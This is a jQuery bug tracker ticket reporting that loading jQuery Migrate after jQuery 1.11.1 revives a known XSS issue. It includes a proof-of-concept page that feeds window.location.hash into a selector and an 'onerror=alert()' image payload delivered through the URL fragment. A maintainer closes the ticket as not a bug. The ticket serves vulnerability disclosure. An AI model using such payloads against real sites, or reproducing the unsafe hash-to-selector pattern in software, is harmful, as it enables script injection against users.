Bug Tracker

Opened 5 years ago

Closed 5 years ago

#15226 closed bug (notabug)

Invalidating issue #9521

Reported by: 11paths Owned by:
Priority: low Milestone: None
Component: unfiled Version: 1.11.1
Keywords: Cc:
Blocked by: Blocking:

Description

When including "jquery migrate" library after jquery (in that particular order) you get to invalidate issue #9521, creating a XSS condition.

<html><head>
<script src='http://code.jquery.com/jquery-1.11.1.js'></script>
<script src='http://code.jquery.com/jquery-migrate-1.2.1.js'></script>
</head><body><a href="" ></a><script>
$('a[href="' + window.location.hash + '"]');
</script></body></html>

When passing a selector plus an item as a parameter:

$('a[href="<img src=a onerror=alert()>"]');

And then calling.

http://localhost/test.html#<img src=a onerror=alert()>

Would trigger the XSS condition.

Change History (1)

comment:1 Changed 5 years ago by dmethvin

Resolution: notabug
Status: newclosed

Yes, jQuery Migrate restores the old "looks like HTML" rules because if it doesn't it breaks code. Any page that injects untrusted content into the page has a bug in their own code. By definition, jQuery allows developers to inject HTML and scripts into their pages so the developer needs to know what they are injecting. There is discussion here: https://github.com/jquery/jquery-migrate/issues/36

Note: See TracTickets for help on using tickets.